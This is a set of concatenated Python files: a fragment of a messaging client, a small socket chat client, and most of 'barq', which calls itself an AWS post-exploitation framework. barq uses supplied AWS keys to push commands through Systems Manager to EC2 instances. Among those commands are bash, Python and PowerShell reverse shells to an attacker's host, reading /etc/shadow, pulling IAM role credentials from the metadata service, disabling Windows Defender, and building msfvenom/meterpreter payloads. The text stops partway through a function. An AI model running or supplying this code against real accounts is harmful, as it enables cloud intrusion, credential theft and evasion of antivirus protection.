# send_msg() sends our message and returns a response message
# str() creates a copy of the response message string
response = orsoqs.send_msg(self.osocket, request).str()
response = json.loads(response)
if 'error' in response and response['error'] == True:
return False
elif 'result' in response and response['result'] == True:
return True
else:
return False
test = qim_client(None, 'tcp://127.0.0.1:12346', 'tcp://127.0.0.1:12345', 'bases.bin')
signal.pause()
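# Usage sketch (the endpoints above and the address below are illustrative): send() takes
# a numeric IP address in network byte order plus the message string, which it encodes
# into SDC flags before pushing it through the orsoqs socket, e.g.
#   test.send(some_numeric_address, 'hello')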
|
user.py
|
import socket
import threading
username = input("Choose your username: ")
user = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ip = '127.0.0.1'
port = 55555
user.connect((ip, port))
# defining the function to receive the user's data
def receive():
while True:
try:
msg = user.recv(2048).decode('ascii')
if(msg == 'USER_NAME'):
user.send(username.encode('ascii'))
else:
print(msg)
except:
print("Something went wrong")
user.close()
break
# defining the function to enable the user to send new messages
def new_message():
while True:
msg = f'{username}: {input("")}'
user.send(msg.encode('ascii'))
receive_thread = threading.Thread(target=receive)
receive_thread.start()
new_message_thread = threading.Thread(target=new_message)
new_message_thread.start()
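# Protocol sketch implied by receive() (assumption: the matching server listens on
# 127.0.0.1:55555): the server sends the literal string 'USER_NAME' once, the client
# answers with its username, and every other received message is printed as-is.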
|
barq.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import boto3, json
from clint.arguments import Args
from clint.textui import puts, colored, indent, prompt, validators
import time
from prettytable import PrettyTable
import string
import os
import random
import subprocess
import readline
import sys
import signal
import re
from threading import Event, Thread
import logging
from getpass import getpass
from pygments import highlight
from pygments.lexers.data import JsonLexer
from pygments.formatters.terminal import TerminalFormatter
#signing commit again
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3
if PY3:
string_types = str,
raw_input = input
else:
string_types = basestring,
def id_generator(size=10, chars=string.ascii_uppercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
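# Example: id_generator() yields a 10-character string of uppercase letters and digits,
# e.g. something like 'QX3ZK7P2BD' (random per call); below it is used to build throwaway
# names such as 'role' + id_generator().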
def set_session_region(region):
global my_aws_creds
mysession = None
try:
if my_aws_creds['aws_session_token'] == '':
mysession = boto3.session.Session(aws_access_key_id=my_aws_creds['aws_access_key_id'],aws_secret_access_key=my_aws_creds['aws_secret_access_key'],region_name=region)
else:
mysession = boto3.session.Session(aws_access_key_id=my_aws_creds['aws_access_key_id'],aws_secret_access_key=my_aws_creds['aws_secret_access_key'],region_name=region,aws_session_token=my_aws_creds['aws_session_token'])
return mysession
except:
return None
def color(string, color=None):
"""
Change text color for the Linux terminal. (Taken from Empire: https://github.com/EmpireProject/Empire/blob/master/lib/common/helpers.py)
"""
attr = []
# bold
attr.append('1')
if color:
if color.lower() == "red":
attr.append('31')
elif color.lower() == "green":
attr.append('32')
elif color.lower() == "yellow":
attr.append('33')
elif color.lower() == "blue":
attr.append('34')
return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
else:
if string.strip().startswith("[!]"):
attr.append('31')
return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
elif string.strip().startswith("[+]"):
attr.append('32')
return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
elif string.strip().startswith("[..]"):
attr.append('33')
return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
elif string.strip().startswith("[*]"):
attr.append('34')
return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
else:
return string
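# Example: color('[+] Role created') is rendered bold green because of the '[+]' prefix,
# while color('some text', 'red') forces bold red regardless of prefix.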
def start():
"""
The start of the barq functionality.
:return: None
"""
signal.signal(signal.SIGINT, signal.default_int_handler)
args = Args()
puts(color(asciilogo,'blue'))
puts(color("barq: The AWS post exploitation framework written by Mohammed Aldoub @Voulnet","green"))
global loot_creds
global ec2instances
global menu_stack
global my_aws_creds
global secgroups
global command_invocations
global lambdafunctions
menu_stack = []
loot_creds = {'secrets':[],'tokens':[],'parameters':[]}
ec2instances = {'instances':[]}
lambdafunctions = {'functions':[]}
secgroups = {'groups':[]}
my_aws_creds = {}
command_invocations = {'commands':[]}
global logger
logger = logging.getLogger('log')
logger.setLevel(logging.ERROR)
logpath = 'log.log'
ch = logging.FileHandler(logpath)
ch.setFormatter(logging.Formatter('%(asctime)s: %(message)s'))
logger.addHandler(ch)
logger.error('calling start')
myargs = dict(args.grouped)
if '--help' in myargs or '-h' in myargs:
help = """
barq framework options:
-h --help - This menu
-k --keyid - The AWS access key id
-s --secretkey - The AWS secret access key. (Needs --keyid, mandatory)
-r --region - The default region to use. (Needs --keyid)
-t --token - The AWS session token to use. (Needs --keyid, optional)
"""
print (help)
exit(0)
if '--keyid' in myargs or '-k' in myargs:
try:
aws_access_key_id = myargs['--keyid'][0]
except:
aws_access_key_id = myargs['-k'][0]
if '--secretkey' not in myargs and '-s' not in myargs:
puts(color("[!] using --secretkey is mandatory with --keyid"))
exit()
try:
aws_secret_access_key = myargs['--secretkey'][0]
except:
aws_secret_access_key = myargs['-s'][0]
if '--region' not in myargs and '-r' not in myargs:
puts(color("[!] using --region is mandatory with --keyid"))
exit()
try:
region_name = myargs['--region'][0]
except:
region_name = myargs['-r'][0]
if '--token' in myargs or '-t' in myargs:
try:
aws_session_token = myargs['--token'][0]
except:
aws_session_token = myargs['-t'][0]
else:
aws_session_token = ''
set_aws_creds_inline(aws_access_key_id,aws_secret_access_key,region_name,aws_session_token)
menu_forward('main')
def menu_forward(menu):
"""
Go forward to a new menu (Push to menu stack)
:param menu: The menu to go to
:return: None
"""
global menu_stack
global logger
if menu == 'training':
menu_stack.append(menu)
training_loop()
elif menu == 'ec2instances':
menu_stack.append(menu)
instances_loop()
else:
logger.error('calling menu forward for main')
menu_stack.append('main')
main_loop()
def menu_backward():
"""
Go back to previous menu (Pull from menu stack)
:return: None
"""
global menu_stack
try:
current_menu = menu_stack.pop()
next_menu = menu_stack[-1]
if next_menu == 'main':
go_to_menu(next_menu)
elif next_menu == 'training':
go_to_menu(next_menu)
elif next_menu == 'ec2instances':
go_to_menu(next_menu)
except Exception as e:
print(e)
pass
def go_to_menu(menu):
"""
Go to a menu directly, bypassing the stack. This is used for functionality that involves interaction under a particular menu,
and therefore does not add a menu to the stack.
:param menu: menu to go to directly.
:return: None
"""
if menu == 'main':
main_loop()
elif menu == 'training':
training_loop()
elif menu == 'ec2instances':
instances_loop()
def handle_menu():
"""
Pop the top menu from the stack and go to it.
:return: None
"""
global menu_stack
try:
current_menu = menu_stack.pop()
if current_menu == 'main':
main_loop()
elif current_menu == 'ec2instances':
instances_loop()
elif current_menu == 'training':
training_loop()
else:
main_loop()
except Exception as e:
print(e)
main_loop()
def training_loop():
"""
The menu handler loop for the training menu. Reads commands and send them to the processor, otherwise shows the menu prompt.
:return: None
"""
try:
command = ''
while command == '':
try:
readline.set_completer_delims(' \t\n;')
readline.parse_and_bind("tab: complete")
readline.set_completer(trainingcomplete)
command = raw_input('barq ' +color('training','yellow') + ' > ' )
except Exception as e:
print(e)
#command = prompt.query('aws sheller training > ', validators=[])
command = str(command)
process_training_command(command)
except KeyboardInterrupt as k:
print("CTRL C clicked in training")
menu_backward()
def disable_windows_defender():
"""
The powershell command to disable windows defender.
:return: Returns the powershell command to disable win defender.
"""
return "Set-MpPreference -DisableRealtimeMonitoring $true"
def enable_windows_defender():
"""
Enable Windows Defender Powershell command.
:return: Returns the powershell command to enable win defender again.
"""
return "Set-MpPreference -DisableRealtimeMonitoring $false"
def wait_for_command_invocation(ssmclient, commandid,instanceid):
"""
:param ssmclient: The ssm (Systems manager) client associated with the required region and account.
:param commandid: The id of the command to check invocation results for.
:param instanceid: The id of the instance on which the command was run.
:return: Returns a tuple of success state and AWS response json in full.
"""
time.sleep(10)
result = ssmclient.get_command_invocation(CommandId=commandid,InstanceId=instanceid)
puts(color('[..] Waiting for command to return.... This will take some time'))
while result['Status'] in {'InProgress', 'Pending','Waiting'}:
time.sleep(10)
result = ssmclient.get_command_invocation(CommandId=commandid,InstanceId=instanceid)
if result['Status'] in {'Failed','TimedOut','Cancelling','Cancelled'}:
puts(color('[!] ERROR: %s'%result['StandardErrorContent']))
return False, result
puts(color('[*] Status of the command is: %s'%result['Status']))
if result['Status'] == 'Success':
puts(color('[+] Success! The command executed successfully. Output is:'))
puts(color(result['StandardOutputContent'],'blue'))
return True, result
def wait_for_threaded_command_invocation( commandid,instanceid, region):
"""
A thread-ready function to wait for invocation for a command on an instance.
TODO: Make it thread-safe by using locks on the global variables.
:param commandid: The command that was run
:param instanceid: The instance on which the command was run.
:param region: The region for Systems Manager
:return: Returns a tuple of success state and AWS response json in full.
"""
global my_aws_creds
logger = logging.getLogger('log')
logger.error('inside wait_for_threaded_command_invocation for %s and commandid: %s' %( instanceid,commandid))
mysession = boto3.session.Session(aws_access_key_id=my_aws_creds['aws_access_key_id'],
aws_secret_access_key=my_aws_creds['aws_secret_access_key'],
region_name=region,
aws_session_token=my_aws_creds['aws_session_token'])
ssmclient = mysession.client('ssm', region_name=region)
time.sleep(10)
logger.error('inside wait_for_threaded_command_invocation for %s and commandid: %s, before get_command_invocation a' % (instanceid, commandid))
result = ssmclient.get_command_invocation(CommandId=commandid,InstanceId=instanceid)
logger.error(
'inside wait_for_threaded_command_invocation for %s and commandid: %s, after get_command_invocation a, status: %s' % (
instanceid, commandid,result['Status']))
while result['Status'] in {'InProgress', 'Pending','Waiting'}:
time.sleep(10)
result = ssmclient.get_command_invocation(CommandId=commandid,InstanceId=instanceid)
if result['Status'] in {'Failed','TimedOut','Cancelling','Cancelled'}:
logger.error(
'failure in wait_for_threaded_command_invocation for %s and commandid: %s, after get_command_invocation b, status: %s' % (
instanceid, commandid, result['Status']))
return False, result
if result['Status'] == 'Success':
logger.error(
'success in wait_for_threaded_command_invocation for %s and commandid: %s, after get_command_invocation b, status: %s' % (
instanceid, commandid, result['Status']))
return True, result
def run_linux_command(ssmclient, instanceid, action, payload):
"""
Run a Systems Manager command on a running Linux instance.
:param ssmclient: Systems Manager client for the required region.
:param instanceid: id of target instance
:param action: Action to be run (AWS calls it DocumentName, here it's running a bash script)
:param payload: The actual payload to be executed on the target instance.
:return: returns status of execution.
"""
response = ssmclient.send_command(InstanceIds=[instanceid,],DocumentName=action,DocumentVersion='$DEFAULT',TimeoutSeconds=3600,Parameters={'commands':[payload]})
commandid = response['Command']['CommandId']
success, result = wait_for_command_invocation(ssmclient,commandid,instanceid)
return success
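# Usage sketch (the region and instance id are hypothetical): with an SSM client for the
# target region, a single shell payload can be pushed to one Linux instance like this.
#
# ssmclient = mysession.client('ssm', region_name='us-east-1')
# run_linux_command(ssmclient, 'i-0123456789abcdef0', 'AWS-RunShellScript', 'uname -a')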
def run_threaded_linux_command(mysession, target, action, payload):
"""
Thread-enabled function to run a Systems Manager command on a running Linux instance.
TODO: Make it thread-safe by using locks on global variables.
:param mysession: The established boto3 session for the target region
:param target: Target EC2 instance
:param action: Action to be run (AWS calls it DocumentName, here it's running a bash script)
:param payload: The actual payload to be executed on the target instance.
:return: None
"""
global my_aws_creds
global command_invocations
logger = logging.getLogger('log')
logger.error('inside run_threaded_linux_command for %s' %target['id'])
mysession = boto3.session.Session(aws_access_key_id=my_aws_creds['aws_access_key_id'],
aws_secret_access_key=my_aws_creds['aws_secret_access_key'], region_name=target['region'],
aws_session_token=my_aws_creds['aws_session_token'])
ssmclient = mysession.client('ssm',region_name=target['region'])
instanceid = target['id']
response = ssmclient.send_command(InstanceIds=[instanceid,],DocumentName=action,DocumentVersion='$DEFAULT',TimeoutSeconds=3600,Parameters={'commands':[payload]})
commandid = response['Command']['CommandId']
logger.error('calling run_threaded_linux_command for %s and command: %s' %(target['id'],commandid))
command = {'id':commandid}
command['instanceid'] = instanceid
command['state'] = 'requested'
command['platform'] = 'linux'
command['region'] = target['region']
command_invocations['commands'].append(command)
time.sleep(10)
try:
result = ssmclient.get_command_invocation(CommandId=commandid,InstanceId=instanceid)
except:
pass
logger.error('calling run_threaded_linux_command for %s and command: %s and result: %s' % (target['id'], commandid,result['Status']))
while result['Status'] in {'InProgress', 'Pending','Waiting'}:
time.sleep(10)
result = ssmclient.get_command_invocation(CommandId=commandid,InstanceId=instanceid)
if result['Status'] in {'Failed','TimedOut','Cancelling','Cancelled'}:
for index, commandx in enumerate(command_invocations['commands']):
if commandx['id'] == commandid:
logger.error('run_threaded_linux_command for %s and command: %s failed with error: %s' % (target['id'], commandid, result['StandardErrorContent']))
commandx['state'] = 'failed'
commandx['error'] = result['StandardErrorContent']
command_invocations['commands'][index] = commandx
return False
if result['Status'] == 'Success':
for index, commandx in enumerate(command_invocations['commands']):
if commandx['id'] == commandid:
logger.error('run_threaded_linux_command for %s and command: %s succeeded with output: %s' % (target['id'], commandid, result['StandardOutputContent']))
commandx['state'] = 'success'
commandx['output'] = result['StandardOutputContent']
command_invocations['commands'][index] = commandx
def run_threaded_windows_command(mysession, target, action, payload, disableav):
"""
Thread-enabled function to run a Systems Manager command on a running Windows instance.
It actually calls three commands: Disable windows defender, run the payload, then enable Windows Defender.
TODO: Make it thread-safe by using locks on global variables.
:param mysession: The established boto3 session for the target region
:param target: Target EC2 instance
:param action: Action to be run (AWS calls it DocumentName, here it's running a powershell script)
:param payload: The actual payload to be executed on the target instance.
:return: True if all stages succeed, False otherwise.
"""
global my_aws_creds
global command_invocations
logger = logging.getLogger('log')
logger.error("inside run_threaded_windows_command for %s" % target['id'])
mysession = boto3.session.Session(aws_access_key_id=my_aws_creds['aws_access_key_id'],
aws_secret_access_key=my_aws_creds['aws_secret_access_key'],
region_name=target['region'],
aws_session_token=my_aws_creds['aws_session_token'])
logger.error("inside run_threaded_windows_command for %s, before line: %s" % (target['id'],'ssmclient'))
ssmclient = mysession.client('ssm',region_name=target['region'])
instanceid = target['id']
#stage1 disable windows defender.
if disableav:
logger.error("inside run_threaded_windows_command for %s, before line: %s" % (target['id'], 'disable_windows_defender'))
response = ssmclient.send_command(InstanceIds=[instanceid,],DocumentName=action,DocumentVersion='$DEFAULT',TimeoutSeconds=3600,Parameters={'commands':[disable_windows_defender()]})
commandid = response['Command']['CommandId']
#############
time.sleep(10)
logger.error("inside run_threaded_windows_command for %s, before line: %s" % (target['id'], 'get_command_invocation 1'))
try:
result = ssmclient.get_command_invocation(CommandId=commandid,InstanceId=instanceid)
except:
pass
#############
success, result = wait_for_threaded_command_invocation(commandid,instanceid, target['region'])
logger.error("inside run_threaded_windows_command for %s, after line: %s" % (target['id'], 'wait_for_threaded_command_invocation 1'))
logger.error("success equals: %s" %success)
if not success:
logger.error('aborting commands for id %s' %target['id'])
return False
#stage2 run payload
time.sleep(3)
logger.error(
"inside run_threaded_windows_command for %s, before line: %s" % (target['id'], 'windows payload'))
response = ssmclient.send_command(InstanceIds=[instanceid,],DocumentName=action,DocumentVersion='$DEFAULT',TimeoutSeconds=3600,Parameters={'commands':[payload]})
commandid = response['Command']['CommandId']
#################
command = {'id':commandid}
command['instanceid'] = instanceid
command['state'] = 'requested'
command['platform'] = 'windows'
command['region'] = target['region']
command_invocations['commands'].append(command)
time.sleep(10)
logger.error("inside run_threaded_windows_command for %s, before line: %s" % (target['id'], 'get_command_invocation 2'))
try:
result = ssmclient.get_command_invocation(CommandId=commandid,InstanceId=instanceid)
except:
pass
while result['Status'] in {'InProgress', 'Pending','Waiting'}:
time.sleep(10)
result = ssmclient.get_command_invocation(CommandId=commandid,InstanceId=instanceid)
if result['Status'] in {'Failed','TimedOut','Cancelling','Cancelled'}:
logger.error("failure running payload in run_threaded_windows_command for %s, commandid: %s" % (target['id'], commandid))
for index, commandx in enumerate(command_invocations['commands']):
if commandx['id'] == commandid:
commandx['state'] = 'failed'
commandx['error'] = result['StandardErrorContent']
command_invocations['commands'][index] = commandx
success = False
break
if result['Status'] == 'Success':
logger.error(
"success running payload in run_threaded_windows_command for %s. commandid: %s" % (target['id'], commandid))
for index, commandx in enumerate(command_invocations['commands']):
if commandx['id'] == commandid:
commandx['state'] = 'success'
commandx['output'] = result['StandardOutputContent']
command_invocations['commands'][index] = commandx
success = True
break
#################
if not success:
logger.error("inside run_threaded_windows_command for %s, failed in running payload" % (target['id']))
#stage3 enable windows defender.
if disableav:
time.sleep(30)
logger.error("inside run_threaded_windows_command for %s, before enable_windows_defender" % (target['id']))
response = ssmclient.send_command(InstanceIds=[instanceid,],DocumentName=action,DocumentVersion='$DEFAULT',TimeoutSeconds=3600,Parameters={'commands':[enable_windows_defender()]})
commandid = response['Command']['CommandId']
success, result = wait_for_threaded_command_invocation(commandid,instanceid,target['region'])
logger.error("inside run_threaded_windows_command for %s, after enable_windows_defender, success: %s" % (target['id'], success))
if not success:
return False
return True
def run_windows_command(ssmclient, instanceid,action,payload, disableav):
"""
Run a Systems Manager command on a running Windows instance.
It actually calls three commands: Disable windows defender, run the payload, then enable Windows Defender.
:param ssmclient: The Systems Manager client for the target region
:param instanceid: Target EC2 instance id
:param action: Action to be run (AWS calls it DocumentName, here it's running a powershell script)
:param payload: The actual payload to be executed on the target instance.
:return: status of execution
"""
time.sleep(3)
#stage1 disable windows defender.
if disableav:
puts(color('[..] Disabling Windows Defender momentarily...'))
response = ssmclient.send_command(InstanceIds=[instanceid,],DocumentName=action,DocumentVersion='$DEFAULT',TimeoutSeconds=3600,Parameters={'commands':[disable_windows_defender()]})
commandid = response['Command']['CommandId']
success, result = wait_for_command_invocation(ssmclient,commandid,instanceid)
if not success:
puts(color('[!] Could not disable Windows Defender... Stopping command invocation...'))
return False
#stage2 run payload
puts(color('[..] Running payload...'))
time.sleep(3)
response = ssmclient.send_command(InstanceIds=[instanceid,],DocumentName=action,DocumentVersion='$DEFAULT',TimeoutSeconds=3600,Parameters={'commands':[payload]})
commandid = response['Command']['CommandId']
success, result = wait_for_command_invocation(ssmclient,commandid,instanceid)
if not success:
puts(color('[!] Could not run payload... Stopping command invocation...'))
return False
#stage3 enable windows defender.
if disableav:
time.sleep(30)
puts(color('[..] Enabling Windows Defender again....'))
response = ssmclient.send_command(InstanceIds=[instanceid,],DocumentName=action,DocumentVersion='$DEFAULT',TimeoutSeconds=3600,Parameters={'commands':[enable_windows_defender()]})
commandid = response['Command']['CommandId']
success, result = wait_for_command_invocation(ssmclient,commandid,instanceid)
if not success:
puts(color('[!] Could not enable Windows Defender... Stopping command invocation...'))
return False
return True
PRINT_EC2_METADATA_CMD = "python -c \"import requests, json; b = 'http://169.254.169.254/latest/';m='meta-data/';roleid = requests.get(b+m+'iam/security-credentials/').text; print '{RoleID: %s,'%roleid;print 'Credentials: %s,'%(requests.get(b+m+'iam/security-credentials/%s'%roleid).text); print 'AMIID: %s,'%(requests.get(b+m+'ami-id').text); print 'PublicIP: %s,'%(requests.get(b+m+'public-ipv4').text); print 'PublicHostname:%s,'%(requests.get(b+m+'public-hostname').text); print 'InstanceIdentityDocument: %s,'%(requests.get(b+'dynamic/instance-identity/document').text);print 'UserData:%s}'%(requests.get(b+'user-data/').text);\""
PRINT_EC2_METADATA_PSH = "$b = 'http://169.254.169.254/latest/';$m='meta-data/';$roleid = (Invoke-WebRequest -UseBasicParsing -Uri ($b+$m+'iam/security-credentials/')).Content;echo ('--->Role ID: '+$roleid);echo ('--->Credentials: '+($instanceId = Invoke-WebRequest -UseBasicParsing -Uri ($b+$m+'iam/security-credentials/'+$roleid)).Content);echo ('--->AMI-ID: '+($instanceId = Invoke-WebRequest -UseBasicParsing -Uri ($b+$m+'ami-id')).Content);echo ('--->Public IP: '+($instanceId = Invoke-WebRequest -UseBasicParsing -Uri ($b+$m+'public-ipv4')).Content);echo ('--->Public Hostname: '+($instanceId = Invoke-WebRequest -UseBasicParsing -Uri ($b+$m+'public-hostname')).Content);echo ('--->Instance Identity Document: '+($instanceId = Invoke-WebRequest -UseBasicParsing -Uri ($b+'dynamic/instance-identity/document')).Content);echo ('--->UserData: '+($instanceId = Invoke-WebRequest -UseBasicParsing -Uri ($b+'user-data/')));"
def choose_training_ami():
"""
Choose the AMI name for the training mode based on the OS choice.
:return: Tuple of OS and AMI name.
"""
puts(color('[*] Choose your EC2 OS:'))
ami_options = [{'selector':'1','prompt':'Linux','return':'linux'},
{'selector':'2','prompt':'Windows','return':'windows'}]
ami = prompt.options('Options:', ami_options)
if ami == 'windows':
return "windows",'Windows_Server-2019-English-Full-Base-2019.01.10'
return "linux",'amzn2-ami-hvm-2.0.20190115-x86_64-gp2'
def shellscript_options(OS):
"""
Prompts command options against an EC2 instance, depending on target OS.
:param OS: Target instance OS.
:return: Tuple of payload and action (AWS SSM DocumentName)
"""
disableav = False
puts(color('[*] Choose your payload:'))
if OS == 'linux':
payload_options = [{'selector':'1','prompt':'cat /etc/passwd','return':'cat /etc/passwd'},
{'selector':'2','prompt':'cat /etc/shadow','return':'cat /etc/shadow'},
{'selector':'3','prompt':'uname -a','return':'uname -a'},
{'selector':'4', 'prompt':'reverse shell to external host', 'return':'reverseshell'},
{'selector':'5','prompt':'whoami','return':'whoami'},
{'selector':'6','prompt':'metasploit','return':'msf'},
{'selector':'7','prompt':'print EC2 metadata and userdata (custom init script)','return':PRINT_EC2_METADATA_CMD},
{'selector':'8','prompt':'Visit a URL from inside EC2 instance','return':'URL'}]
action = 'AWS-RunShellScript'
else:
payload_options = [{'selector':'1','prompt':'ipconfig','return':'ipconfig'},
{'selector':'2', 'prompt':'reverse shell to external host', 'return':'reverseshell'},
{'selector':'3','prompt':'whoami','return':'whoami'},
{'selector':'4','prompt':'metasploit','return':'msf'},
{'selector':'5','prompt':'print EC2 metadata and userdata (custom init script)','return':PRINT_EC2_METADATA_PSH},
{'selector':'6','prompt':'Visit a URL from inside EC2 instance','return':'URL'}]
action = 'AWS-RunPowerShellScript'
payload = prompt.options('Payload:', payload_options)
remote_ip_host = ''
remote_port = ''
if payload == "reverseshell" or payload == "msf":
puts(color('[*] You chose %s option. First provide your remote IP and port to explore shell options.' %payload))
remote_ip_host = prompt.query('Your remote IP or hostname to connect back to:')
remote_port = prompt.query("Your remote port number:", default="4444")
if payload == "reverseshell":
payload, action = reverseshell_options(remote_ip_host, remote_port, OS)
elif payload == "msf":
payload, action = metasploit_installed_options(remote_ip_host, remote_port, OS)
disableav = True
elif payload == 'URL':
puts(color('[*] Choose the URL to visit from inside the EC2 instance:'))
URL = prompt.query('URL: ', default="http://169.254.169.254/latest/")
if OS == 'linux':
payload = "python -c \"import requests; print requests.get('%s').text;\"" %URL
else:
payload = "echo (Invoke-WebRequest -UseBasicParsing -Uri ('%s')).Content;" %URL
return payload,action, disableav
def reverseshell_options(host,port, OS):
"""
Prompts for reverse shell options against an EC2 instance depending on its OS.
:param host: The listening server's IP or hostname
:param port: Port to listen on for shells.
:param OS: OS of that target instance.
:return: Tuple of reverse shell payload and action (AWS SSM DocumentName)
"""
puts(color('[*] Choose your reverse shell type:'))
bash_shell = "bash -i >& /dev/tcp/%s/%s 0>&1" %(host, port)
python_shell = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"%s\",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" %(host, port)
powershell_shell = "$client = New-Object System.Net.Sockets.TCPClient(\"%s\",%s);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" %(host, port)
if OS == "linux":
action = "AWS-RunShellScript"
shell_options = [{'selector':'1','prompt':'Bash reverse shell','return':bash_shell},
{'selector':'2','prompt':'Python reverse shell','return':python_shell},
{'selector':'3','prompt':'Empire Python Launcher','return':'empirepython'}]
else:
action = "AWS-RunPowerShellScript"
shell_options = [{'selector':'1','prompt':'Powershell reverse shell','return':powershell_shell},
{'selector':'2','prompt':'Empire Powershell Launcher','return':'empirepowershell'}]
reverseshell = prompt.options('Payload:', shell_options)
if reverseshell == 'empirepowershell' or reverseshell == 'empirepython':
puts(color('[*] Generate your Empire launcher code in empire and paste it here:'))
reverseshell = raw_input('Paste here:')
return reverseshell, action
def reverseshell_multiple_options( linux, windows):
"""
Prompts for reverse shell options against a range of EC2 instances depending on their OS.
:param linux: Whether or not there are any targeted instances running Linux.
:param windows: Whether or not there are any targeted instances running Windows.
:return: Tuple of reverse shell payloads for linux and windows.
"""
puts(color('[*] Choose your reverse shell type:'))
puts(color('[*] Make sure your listening server can handle multiple simultaneous reverse shell connections:'))
linuxattack = ''
windowsattack = ''
if linux:
linux_options = [{'selector':'1','prompt':'Bash reverse shell','return':'bash'},
{'selector':'2','prompt':'Python reverse shell','return':'python'},
{'selector':'3','prompt':'Empire Python Launcher','return':'empirepython'}]
linuxattack = prompt.options('Payload for Linux EC2 instances:', linux_options)
if linuxattack == 'empirepython':
puts(color('[*] Generate your Empire python launcher code in empire and paste it here:'))
linuxattack = raw_input('Paste here:')
else:
host = prompt.query('Your remote IP or hostname to connect back to:')
port = prompt.query("Your remote port number:", default="4444")
if linuxattack == 'bash':
linuxattack = "bash -i >& /dev/tcp/%s/%s 0>&1" %(host, port)
elif linuxattack == 'python':
linuxattack = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"%s\",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" %(host, port)
if windows:
windows_options = [{'selector':'1','prompt':'Powershell reverse shell','return':'powershell'},
{'selector':'2','prompt':'Empire Powershell Launcher','return':'empirepowershell'}]
windowsattack = prompt.options('Payload for Windows EC2 instances:', windows_options)
if windowsattack == 'empirepowershell':
puts(color('[*] Generate your Empire powershell launcher code in empire and paste it here:'))
windowsattack = raw_input('Paste here:')
else:
host = prompt.query('Your remote IP or hostname to connect back to:')
port = prompt.query("Your remote port number:", default="5555")
if windowsattack == 'powershell':
windowsattack = "$client = New-Object System.Net.Sockets.TCPClient(\"%s\",%s);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" %(host, port)
return linuxattack,windowsattack
def metasploit_not_installed_options(host, port, OS):
"""
options in case metasploit is not locally installed on attack system.
TODO: Implement this
:param host: The listening server's IP or hostname
:param port: Port to listen on for shells.
:param OS: OS of that target instance.
:return: Nothing
"""
pass
def metasploit_installed_multiple_options( linux, windows):
"""
Prompts for metasploit options against a range of EC2 instances depending on their OS.
:param linux: Whether or not there are any targeted instances running Linux.
:param windows: Whether or not there are any targeted instances running Windows.
:return: Tuple of metasploit payloads for linux and windows.
"""
puts(color('[*] Choose your metasploit payload. This requires msfvenom to be installed in your system.'))
linux_tcp_meterpreterx64 = 'python/meterpreter/reverse_tcp'
linux_https_meterpreterx64 = 'python/meterpreter/reverse_https'
linux_tcp_shell = 'python/shell_reverse_tcp'
windows_tcp_meterpreterx64 = 'windows/x64/meterpreter/reverse_tcp'
windows_https_meterpreterx64 = 'windows/x64/meterpreter/reverse_https'
windows_tcp_shell = 'windows/x64/shell/reverse_tcp'
linuxattack = ''
windowsattack = ''
#remote_ip_host = prompt.query('Your remote IP or hostname to connect back to:')
#remote_port = prompt.query("Your remote port number:", default="4444")
if linux:
linux_options = [{'selector':'1','prompt':'Linux Meterpreter reverse TCP x64','return':linux_tcp_meterpreterx64},
{'selector':'2','prompt':'Linux Meterpreter reverse HTTPS x64','return':linux_https_meterpreterx64},
{'selector':'3','prompt':'Linux TCP Shell','return':linux_tcp_shell}]
linuxpayload = prompt.options('Payload for Linux EC2 instances:', linux_options)
host = prompt.query('Your remote IP or hostname to connect back to:')
port = prompt.query("Your remote port number (Listener ports should be different for linux and windows):", default="4444")
linuxmsfshell = 'msfvenom -a python --platform python -p %s LHOST=%s LPORT=%s -f raw --smallest' %(linuxpayload,host, port)
puts(color('[*] Run the following command on your remote listening server to run the linux payload handler:'))
msfconsole_cmd = "msfconsole -x 'use exploit/multi/handler; set LHOST %s; set lport %s; set payload %s;run -j;'" %(host, port, linuxpayload)
puts(colored.magenta(msfconsole_cmd))
linuxattack = os.popen(linuxmsfshell).read()
linuxattack = "python -c \"%s\"" %linuxattack
if windows:
windows_options = [{'selector':'1','prompt':'Windows Meterpreter reverse TCP x64','return':windows_tcp_meterpreterx64},
{'selector':'2','prompt':'Windows Meterpreter reverse HTTPS x64','return':windows_https_meterpreterx64},
{'selector':'3','prompt':'Windows TCP Shell','return':windows_tcp_shell}]
windowspayload = prompt.options('Payload for Windows EC2 instances:', windows_options)
host = prompt.query('Your remote IP or hostname to connect back to:')
port = prompt.query("Your remote port number (Listener ports should be different for linux and windows):", default="5555")
windowsmsfshell = 'msfvenom -a x64 --platform Windows -p %s LHOST=%s LPORT=%s --f psh-net --smallest' %(windowspayload, host, port)
puts(color('[*] Run the following command on your remote listening server to run the windows payload handler:'))
msfconsole_cmd = "msfconsole -x 'use exploit/multi/handler; set LHOST %s; set lport %s; set payload %s;run -j;'" %(host, port, windowspayload)
